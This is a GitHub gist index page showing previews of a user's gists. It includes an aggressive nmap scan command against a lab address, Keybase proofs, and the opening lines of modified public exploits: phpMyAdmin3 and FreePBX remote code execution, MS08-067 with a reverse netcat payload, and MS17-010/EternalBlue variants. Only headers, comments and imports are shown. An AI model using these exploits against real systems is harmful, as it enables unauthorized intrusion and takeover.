Skip to content

Instantly share code, notes, and snippets.

@thel3l
thel3l / breach2_1-Nmapscan.txt
Created September 12, 2016 16:23
Colde Storage for all content from my site.
root@kali:~# nmap -T4 -A -v -p0-65535 192.168.110.151

Keybase proof

I hereby claim:

  • I am thel3l on github.
  • I am thel3l (https://keybase.io/thel3l) on keybase.
  • I have a public key whose fingerprint is 1DA2 4664 C293 EAFD 8E5B C7A7 BF6F B0EF D1AF C501

To claim this, I am signing this object:

Keybase proof

I hereby claim:

  • I am thel3l on github.
  • I am thel3l (https://keybase.io/thel3l) on keybase.
  • I have a public key whose fingerprint is B31B 7D96 BFC5 C027 134E 7051 1E72 8F19 348C 5779

To claim this, I am signing this object:

Keybase proof

I hereby claim:

  • I am thel3l on github.
  • I am thel3l (https://keybase.io/thel3l) on keybase.
  • I have a public key whose fingerprint is B31B 7D96 BFC5 C027 134E 7051 1E72 8F19 348C 5779

To claim this, I am signing this object:

@thel3l
thel3l / 17510-fixed.py
Last active May 11, 2020 18:17
phpMyAdmin3 (pma3) - Remote Code Execution - CVE-2011-2505, CVE-2011-2506 (https://www.exploit-db.com/exploits/17510/): Fixes urlopen SSL 'Version too Low' errors
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
@thel3l
thel3l / 18650-fixed.py
Created June 2, 2018 11:31
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
@thel3l
thel3l / ms08-067-fixed.py
Created June 3, 2018 16:32
Updated ms08-67 exploit without custom netcat listener.
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct
@thel3l
thel3l / ms17-010_sleepya-fixed.py
Created June 25, 2018 04:06
Modified version of Sleepya's MS17-010 exploit to create and add a user to the administrative group
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
@thel3l
thel3l / ms17-010_Win7_2008.py
Created June 25, 2018 09:59
Sleepya's port of the Eternalblue exploit for systems running Windows 7/Server 2008. Requires mysmb.py.
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
@thel3l
thel3l / mysmb.py
Created June 25, 2018 09:59
Impacket SMB extension for MS17-010 exploit.
# impacket SMB extension for MS17-010 exploit.
# this file contains only valid SMB packet format operation.
from impacket import smb, smbconnection
from impacket.dcerpc.v5 import transport
from struct import pack
import os
import random
def getNTStatus(self):